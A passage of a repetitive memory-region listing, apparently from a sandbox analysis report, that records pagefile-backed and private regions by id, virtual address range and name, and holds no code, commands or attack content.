= 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 20607 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 20608 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 20609 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 20610 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 20611 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 20612 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 20613 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 20614 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 20615 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 20616 start_va = 0xc870000 end_va = 0xcd67fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000c870000" filename = "" Region: id = 20617 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 20618 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 20619 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 20620 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 20621 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 20622 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 20623 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 20624 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 20625 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 20626 start_va = 0x4140000 end_va = 0x415ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004140000" filename = "" Region: id = 20627 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 20628 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 20629 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 20630 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 20631 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 20632 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 20633 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 20634 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 20635 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 20636 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 20637 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 20638 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 20639 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 20640 start_va = 0x2100000 end_va = 0x2100fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 20641 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 20642 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 20643 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 20644 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 20645 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 20646 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 20647 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 20648 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 20649 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 20650 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 20651 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 20652 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 20653 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 20654 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 20655 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 20656 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 20657 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 20658 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 20659 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 20660 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 20661 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 20662 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 20663 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 20664 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 20665 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 20666 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 20667 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 20668 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 20669 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 20670 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 20671 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 20672 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 20673 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 20674 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 20675 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 20676 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 20677 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 20678 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 20679 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 20680 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 20681 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 20682 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 20683 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 20684 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 20685 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 20686 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 20687 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 20688 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 20689 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 20690 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 20691 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 20692 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 20693 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 20694 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 20695 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 20696 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 20697 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 20698 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 20699 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 20700 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 20701 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 20702 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 20703 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 20704 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 20705 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 20706 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 20707 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 20708 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 20709 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 20710 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 20711 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 20712 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 20713 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 20714 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 20715 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 20716 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 20717 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 20718 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 20719 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 20720 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 20721 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 20722 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 20723 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 20724 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 20725 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 20726 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 20727 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 20728 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 20729 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 20730 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 20731 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 20732 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 20733 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 20734 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 20735 start_va = 0x570000 end_va = 0x570fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 20736 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 20737 start_va = 0x4140000 end_va = 0x415ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004140000" filename = "" Region: id = 20738 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 20739 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 20740 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 20741 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 20742 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 20743 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 20744 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 20745 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 20746 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 20747 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 20748 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 20749 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 20750 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 20751 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 20752 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 20753 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 20754 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 20755 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 20756 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 20757 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 20758 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 20759 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 20760 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 20761 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 20762 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 20763 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 20764 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 20765 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 20766 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 20767 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 20768 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 20769 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 20770 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 20771 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 20772 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 20773 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 20774 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 20775 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 20776 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 20777 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 20778 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 20779 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 20780 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 20781 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 20782 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 20783 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 20784 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 20785 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 20786 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 20787 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 20788 start_va = 0x2100000 end_va = 0x2100fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 20789 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 20790 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 20791 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 20792 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 20793 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 20794 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 20795 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 20796 start_va = 0x570000 end_va = 0x57efff monitored = 